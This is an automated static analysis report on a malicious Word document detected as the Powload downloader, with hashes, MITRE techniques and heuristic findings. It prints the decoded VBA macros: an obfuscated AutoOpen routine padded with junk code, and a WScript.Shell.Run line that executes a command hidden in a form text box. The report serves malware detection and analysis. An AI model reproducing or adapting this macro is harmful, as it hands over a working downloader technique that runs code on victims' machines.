Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a2e46067d3710ec…

MALICIOUS

Office (OLE)

Size: 105.1 KB
Created: 2019-01-14 22:59:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: a8a3324499dc82dd2986ba80e11d3884
SHA-1: aff52bf72d5c3b20fdb864efc6362ee75492a685
SHA-256: 5a2e46067d3710ece2abdb092e7a3e49075ca19d0849e6499fb7953c28a9ec8e
Risk score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of WScript.Shell and a Shell() call, strongly suggesting the execution of arbitrary commands. This is likely used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Malware.Powload'.

Heuristics 9

  • ClamAV: Doc.Malware.Powload-6815340-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6815340-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
          End Select
    generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
       Select Case impactfuli
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
          End Select
    generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
       Select Case impactfuli
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "FerryK"
    Sub autoopen()
    enterprisem = IncredibleRubberSoapX - quantifyingu
  • Reference to Windows Script Host (high) SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7470 bytes
SHA-256: d3c11c78007cd1f9e4b5e9c6cf213eb0b5fe2401108870ac5ed9e7dcff750b37

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "SynergisticB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "TunnelN"
Function SQLl()
On Error Resume Next
   Select Case H1080p93
         Case 219
quantifyM = redefineB
            Bahta = CDate(indexq)
            AutoLoanAccounts = bottomlinek
            AGPA = Sgn(OptimizationB)
         Case 165
            paymentE = 361
            yellowm = CDbl(787)
GenericSteelCheesei = Sharablei
            Fieldsd = Sin(middlewarej)
         Case 921
greenb = orchestrates
            BerkshireK = Fix(RAMK)
GrassrootsP = Marketst
            InvestmentAccountB = Round(900)
            hackingH = synergiesf
      End Select
   Select Case depositG
         Case 195
NorthDakotaa = RefinedSoftChipsb
            parser = CDate(Recontextualizedw)
            DirectZ = FallY
            PracticalFreshShoesb = Sgn(Licensedl)
         Case 399
            Homeh = 369
            AngolaS = CDbl(49)
ErgonomicSoftHatW = invoiceu
            GenericFrozenChickenk = Sin(PersonalLoanAccounta)
         Case 848
maroonI = recontextualizeU
            greyi = Fix(marketsp)
dotcomc = TrailY
            capabilityu = Round(878)
            salmonM = overridingE
      End Select
   Select Case HomeLoanAccountj
         Case 232
MississippiR = CheckingAccountR
            transmitterf = CDate(synthesizingJ)
            Districtz = paymentN
            invoicet = Sgn(tanp)
         Case 905
            multibytei = 730
            transmitj = CDbl(271)
dedicatedZ = harnessK
            onlineB = Sin(ShoesBabyGardenZ)
         Case 811
programmingX = NationalC
            connectingS = Fix(Refinedc)
KidsGroceryA = ConcreteP
            Integrationu = Round(214)
            GorgeousWoodenSausagesk = Metalu
      End Select
generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
   Select Case impactfuli
         Case 655
paymentY = z2436554
            ConsultantJ = CDate(budgetarymanagementB)
            SavingsAccountz = cyanB
            Creativez = Sgn(HandcraftedSoftShoesB)
         Case 98
            circuitB = 946
            BordersY = CDbl(17)
Borderso = CaymanIslandsDollarp
            holisticY = Sin(compositew)
         Case 610
SCSIS = copyingd
            haptici = Fix(GeorgiaX)
protocolM = yellowU
            ProfoundA = Round(345)
            calculatingC = modelX
      End Select
   Select Case SurinameO
         Case 863
AIU = empowerR
            AwesomeSteelTunad = CDate(Genericc)
            compressH = DirectorW
            servicedeskL = Sgn(parsingA)
         Case 544
            RubberX = 592
            hackc = CDbl(709)
Shoalsw = whiteboardY
            HandcraftedPlasticSaladt = Sin(BedfordshireC)
         Case 912
Louisianaf = Streamlinedk
            internetsolutionh = Fix(paymentU)
CheckingAccountV = Officerp
            endtoends = Round(471)
            TastyFreshShirth = USBA
      End Select
   Select Case RialOmanis
         Case 945
GraniteG = FrenchGuianai
            functionalitiesO = CDate(GamesComputersToolsj)
            Granitev = FreshB
            TCPW = Sgn(transmitR)
         Case 346
            MoneyMarketAccountv = 327
            TexasX = CDbl(675)
PhilippinePesoU = compositew
            objectorientedA = Sin(bypassi)
         Case 826
quantifyT = TennesseeB
            transitiona = Fix(Massachusettso)
Agenti = backendt
            programz = Round(894)
            rebootf = convergenceM
      End Select
   Select Case Futureh
         Case 409
harnessG = PracticalConcreteSoapC
            InvestorE = CDate(visualizez)
            FutureproofedZ = DataY
            SupervisorA = Sgn(AntiguaandBarbudap)
         Case 408
            Steelz = 17
            RussianRublez = CDbl(262)
BordersG = FantasticMetalSaladU
            Computersi = Sin(interfacesW)
         Case 446
leverageH = HandcraftedSoftShirtn
            reintermediateU = Fix(paradigmQ)
HongKongDollarP = HealthClothingGameso
            PracticalConcreteSaladm = Round(431)
            RapidsX = connectingA
      End Select
End Function
Attribute VB_Name = "FerryK"
Sub autoopen()
enterprisem = IncredibleRubberSoapX - quantifyingu
Shoesw = Administratorr - Rubberz
Viaductq = homogeneousq - GardenJeweleryN
capacitorR = HealthQ - AIK
M1080p93 = intermediatez - backupz
SQLl
Bedfordshired = realtimeI - ToolsJeweleryGamesY
leadingedgek = Pinei - lavenderu
Steelq = Shorew - Representativer
dynamicL = MississippiZ - extendO
withdrawalz = OutdoorsGardenKidsc - Handcraftedj
End Sub

Attribute VB_Name = "IndustrialToysIndustrialN"

Attribute VB_Name = "KidsOutdoorsB"

Attribute VB_Name = "Taiwanz"

Attribute VB_Name = "NorthKoreanWonQ"

Attribute VB_Name = "paymenta"

Attribute VB_Name = "neuralY"

Attribute VB_Name = "primaryT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RefinedMetalGlovesn"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CheckingAccountq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "systemq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "GenericConcreteBikeA"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Executivej"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bidirectionald"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False